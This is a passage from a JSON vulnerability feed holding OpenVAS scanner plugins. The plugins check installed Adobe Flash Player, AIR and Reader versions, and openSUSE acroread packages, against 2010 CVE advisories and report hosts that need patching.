\"URL\" , value : \"http://www.adobe.com/support/security/advisories/apsa10-01.html\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_prdts_detect_lin.nasl\", \"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader/Linux/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n# Check for Adobe Flash Player\npVer = get_kb_item(\"AdobeFlashPlayer/Linux/Ver\");\nif(pVer != NULL)\n{\n # Adobe Flash Player version 9.0.0 to 9.0.262 and 10.x to 10.0.45.2\n if(version_in_range(version:pVer, test_version:\"9.0.0\", test_version2:\"9.0.262\") ||\n version_in_range(version:pVer, test_version:\"10.0\", test_version2:\"10.0.45.2\"))\n {\n security_message(0);\n exit(0);\n }\n}\n\n# Adobe Reader\narVer = get_kb_item(\"Adobe/Reader/Linux/Version\");\nif(arVer != NULL)\n{\n # Grep for Adobe Reader version 9.0 to 9.3.2\n if(version_in_range(version:arVer, test_version:\"9.0\", test_version2:\"9.3.2\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T13:05:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "description": "Check for the Version of acroread", "modified": "2018-01-04T00:00:00", "published": "2010-07-12T00:00:00", "id": "OPENVAS:1361412562310850135", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850135", "type": "openvas", "title": "SuSE Update for acroread SUSE-SA:2010:029", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for acroread SUSE-SA:2010:029\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Acrobat Reader was updated to version 9.3.3 to fix lots of security\n issues and bugs, several of whom could be used to execute code by\n trick the target user to open specially crafted PDFs.\n\n Adobes advisory can be found here:\n http://www.adobe.com/support/security/bulletins/apsb10-15.html\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_impact = \"remote code execution\";\ntag_affected = \"acroread on openSUSE 11.0, openSUSE 11.1, openSUSE 11.2\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850135\");\n script_version(\"$Revision: 8287 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-04 08:28:11 +0100 (Thu, 04 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-07-12 11:56:20 +0200 (Mon, 12 Jul 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-029\");\n script_cve_id(\"CVE-2010-1240\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", \"CVE-2010-2212\");\n script_name(\"SuSE Update for acroread SUSE-SA:2010:029\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of acroread\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3.3~2.1\", rls:\"openSUSE11.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3.3~2.1.1\", rls:\"openSUSE11.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3.3~2.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-15T11:58:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "description": "Check for the Version of acroread", "modified": "2017-12-15T00:00:00", "published": "2010-07-12T00:00:00", "id": "OPENVAS:850135", "href": "http://plugins.openvas.org/nasl.php?oid=850135", "type": "openvas", "title": "SuSE Update for acroread SUSE-SA:2010:029", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for acroread SUSE-SA:2010:029\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Acrobat Reader was updated to version 9.3.3 to fix lots of security\n issues and bugs, several of whom could be used to execute code by\n trick the target user to open specially crafted PDFs.\n\n Adobes advisory can be found here:\n http://www.adobe.com/support/security/bulletins/apsb10-15.html\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_impact = \"remote code execution\";\ntag_affected = \"acroread on openSUSE 11.0, openSUSE 11.1, openSUSE 11.2\";\n\n\nif(description)\n{\n script_id(850135);\n script_version(\"$Revision: 8130 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-15 07:31:09 +0100 (Fri, 15 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-07-12 11:56:20 +0200 (Mon, 12 Jul 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-029\");\n script_cve_id(\"CVE-2010-1240\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", \"CVE-2010-2212\");\n script_name(\"SuSE Update for acroread SUSE-SA:2010:029\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of acroread\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3.3~2.1\", rls:\"openSUSE11.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3.3~2.1.1\", rls:\"openSUSE11.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3.3~2.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-06-02T15:55:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4546", "CVE-2010-2160", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-2183", "CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2179", "CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-2162", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-2178"], "description": "This host is installed with Adobe Flash Player/Air and is prone to\n multiple vulnerabilities.", "modified": "2020-05-28T00:00:00", "published": "2010-06-22T00:00:00", "id": "OPENVAS:1361412562310902200", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902200", "type": "openvas", "title": "Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902200\");\n script_version(\"2020-05-28T14:41:23+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-28 14:41:23 +0000 (Thu, 28 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-06-22 13:34:32 +0200 (Tue, 22 Jun 2010)\");\n script_cve_id(\"CVE-2008-4546\", \"CVE-2009-3793\", \"CVE-2010-1297\", \"CVE-2010-2160\",\n \"CVE-2010-2161\", \"CVE-2010-2162\", \"CVE-2010-2163\", \"CVE-2010-2164\",\n \"CVE-2010-2165\", \"CVE-2010-2166\", \"CVE-2010-2167\", \"CVE-2010-2169\",\n \"CVE-2010-2170\", \"CVE-2010-2171\", \"CVE-2010-2173\", \"CVE-2010-2174\",\n \"CVE-2010-2175\", \"CVE-2010-2176\", \"CVE-2010-2177\", \"CVE-2010-2178\",\n \"CVE-2010-2179\", \"CVE-2010-2180\", \"CVE-2010-2181\", \"CVE-2010-2182\",\n \"CVE-2010-2183\", \"CVE-2010-2184\", \"CVE-2010-2185\", \"CVE-2010-2186\",\n \"CVE-2010-2187\", \"CVE-2010-2188\", \"CVE-2010-2189\");\n script_bugtraq_id(40759);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Windows)\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/1421\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/alerts/2010/Jun/1024086.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-14.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader_or_Acrobat/Win/Installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to obtain sensitive\n information or cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"Adobe AIR version prior to 2.0.2.12610,\n\n Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64 on Windows.\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to input validation errors, memory corruptions,\n array indexing, use-after-free, integer and buffer overflows, and\n invalid pointers when processing malformed Flash content.\");\n\n script_tag(name:\"solution\", value:\"Update to Adobe Air 2.0.2.12610 or Adobe Flash Player 9.0.277.0 or 10.0.45.2.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player/Air and is prone to\n multiple vulnerabilities.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ncpe_list = make_list(\"cpe:/a:adobe:flash_player\",\n \"cpe:/a:adobe:adobe_air\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\ncpe = infos[\"cpe\"];\n\nif(cpe == \"cpe:/a:adobe:flash_player\") {\n if(version_is_less(version:vers, test_version:\"9.0.277.0\") ||\n version_in_range(version:vers, test_version:\"10.0\", test_version2:\"10.0.45.1\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"9.0.277.0/10.0.45.2\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n }\n} else if(cpe == \"cpe:/a:adobe:adobe_air\") {\n if(version_is_less(version:vers, test_version:\"2.0.2.12610\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2.0.2.12610\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T10:54:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4546", "CVE-2010-2160", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-2183", "CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2179", "CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-2162", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-2178"], "description": "This host is installed with Adobe Flash Player/Air and is prone to\n multiple vulnerabilities.", "modified": "2017-12-21T00:00:00", "published": "2010-06-22T00:00:00", "id": "OPENVAS:902200", "href": "http://plugins.openvas.org/nasl.php?oid=902200", "type": "openvas", "title": "Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_adobe_prdts_mult_vuln_jun10_win.nasl 8210 2017-12-21 10:26:31Z cfischer $\n#\n# Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attackers to obtain sensitive\n information or cause a denial of service.\n\n Impact Level: Application/System.\";\ntag_affected = \"Adobe AIR version prior to 2.0.2.12610,\n\n Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64 on windows.\";\n\ntag_insight = \"The flaws are due to input validation errors, memory corruptions,\n array indexing, use-after-free, integer and buffer overflows, and\n invalid pointers when processing malformed Flash content.\";\n\ntag_solution = \"Update to Adobe Air2.0.2.12610 or Adobe Flash Player 9.0.277.0 or 10.0.45.2,\n http://get.adobe.com/air\n http://www.adobe.com/support/flashplayer/downloads.html\";\n\ntag_summary = \"This host is installed with Adobe Flash Player/Air and is prone to\n multiple vulnerabilities.\";\n\nif(description)\n{\n script_id(902200);\n script_version(\"$Revision: 8210 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 11:26:31 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-22 13:34:32 +0200 (Tue, 22 Jun 2010)\");\n script_cve_id(\"CVE-2008-4546\", \"CVE-2009-3793\", \"CVE-2010-1297\", \"CVE-2010-2160\",\n \"CVE-2010-2161\", \"CVE-2010-2162\", \"CVE-2010-2163\", \"CVE-2010-2164\",\n \"CVE-2010-2165\", \"CVE-2010-2166\", \"CVE-2010-2167\", \"CVE-2010-2169\",\n \"CVE-2010-2170\", \"CVE-2010-2171\", \"CVE-2010-2173\", \"CVE-2010-2174\",\n \"CVE-2010-2175\", \"CVE-2010-2176\", \"CVE-2010-2177\", \"CVE-2010-2178\",\n \"CVE-2010-2179\", \"CVE-2010-2180\", \"CVE-2010-2181\", \"CVE-2010-2182\",\n \"CVE-2010-2183\", \"CVE-2010-2184\", \"CVE-2010-2185\", \"CVE-2010-2186\",\n \"CVE-2010-2187\", \"CVE-2010-2188\", \"CVE-2010-2189\");\n script_bugtraq_id(40759);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Windows)\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/1421\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/alerts/2010/Jun/1024086.html\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/bulletins/apsb10-14.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPOd\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader_or_Acrobat/Win/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nCPE = \"cpe:/a:adobe:flash_player\";\nif(playerVer = get_app_version(cpe:CPE, nofork:TRUE))\n{\n # Grep for version 10.x < 10.0.45.2, less than 9.0.277.0\n if(version_is_less(version:playerVer, test_version:\"9.0.277.0\") ||\n version_in_range(version:playerVer, test_version:\"10.0\", test_version2:\"10.0.45.1\"))\n {\n security_message(0);\n exit(0);\n }\n}\n\nCPE = \"cpe:/a:adobe:adobe_air\";\nif(airVer = get_app_version(cpe:CPE))\n{\n # Grep for version < 2.0.2.12610\n if(version_is_less(version:airVer, test_version:\"2.0.2.12610\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-14T10:49:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4546", "CVE-2010-2160", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-2183", "CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2179", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-2162", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-2178"], "description": "This host is installed with Adobe Flash Player/Air and is prone to\n multiple vulnerabilities.", "modified": "2017-06-29T00:00:00", "published": "2010-06-22T00:00:00", "id": "OPENVAS:902194", "href": "http://plugins.openvas.org/nasl.php?oid=902194", "type": "openvas", "title": "Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Linux)", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_adobe_prdts_mult_vuln_jun10_lin.nasl 6476 2017-06-29 07:32:00Z cfischer $\n#\n# Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow remote attackers to obtain sensitive\n information or cause a denial of service.\n Impact Level: Application/System.\";\ntag_affected = \"Adobe AIR version prior to 2.0.2.12610,\n Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64 on Linux.\";\ntag_insight = \"The flaws are due to input validation errors, memory corruptions,\n array indexing, use-after-free, integer and buffer overflows, and\n invalid pointers when processing malformed Flash content.\";\ntag_solution = \"Update to Adobe Air2.0.2.12610 or Adobe Flash Player 9.0.277.0 or 10.0.45.2,\n http://get.adobe.com/air\n http://www.adobe.com/support/flashplayer/downloads.html\";\ntag_summary = \"This host is installed with Adobe Flash Player/Air and is prone to\n multiple vulnerabilities.\";\n\nif(description)\n{\n script_id(902194);\n script_version(\"$Revision: 6476 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-06-29 09:32:00 +0200 (Thu, 29 Jun 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-22 13:34:32 +0200 (Tue, 22 Jun 2010)\");\n script_cve_id(\"CVE-2008-4546\", \"CVE-2009-3793\", \"CVE-2010-1297\", \"CVE-2010-2160\",\n \"CVE-2010-2161\", \"CVE-2010-2162\", \"CVE-2010-2163\", \"CVE-2010-2164\",\n \"CVE-2010-2165\", \"CVE-2010-2166\", \"CVE-2010-2167\", \"CVE-2010-2169\",\n \"CVE-2010-2170\", \"CVE-2010-2171\", \"CVE-2010-2172\", \"CVE-2010-2173\",\n \"CVE-2010-2174\", \"CVE-2010-2175\", \"CVE-2010-2176\", \"CVE-2010-2177\",\n \"CVE-2010-2178\", \"CVE-2010-2179\", \"CVE-2010-2180\", \"CVE-2010-2181\",\n \"CVE-2010-2182\", \"CVE-2010-2183\", \"CVE-2010-2184\", \"CVE-2010-2185\",\n \"CVE-2010-2186\", \"CVE-2010-2187\", \"CVE-2010-2188\", \"CVE-2010-2189\");\n script_bugtraq_id(40759);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Linux)\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/1421\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/alerts/2010/Jun/1024086.html\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/bulletins/apsb10-14.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPOd\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader/Linux/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n# Check for Adobe Flash Player\nplayerVer = get_kb_item(\"AdobeFlashPlayer/Linux/Ver\");\nif(playerVer != NULL)\n{\n # Grep for version 10.x < 10.0.45.2, less than 9.0.277.0\n if(version_is_less(version:playerVer, test_version:\"9.0.277.0\") ||\n version_in_range(version:playerVer, test_version:\"10.0\", test_version2:\"10.0.45.1\"))\n {\n security_message(0);\n exit(0);\n }\n}\n\n# Check for Adobe Air\nairVer = get_kb_item(\"Adobe/Air/Linux/Ver\");\nif(airVer != NULL)\n{\n # Grep for version < 2.0.2.12610\n if(version_is_less(version:airVer, test_version:\"2.0.2.12610\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:54:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4546", "CVE-2010-2160", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-2183", 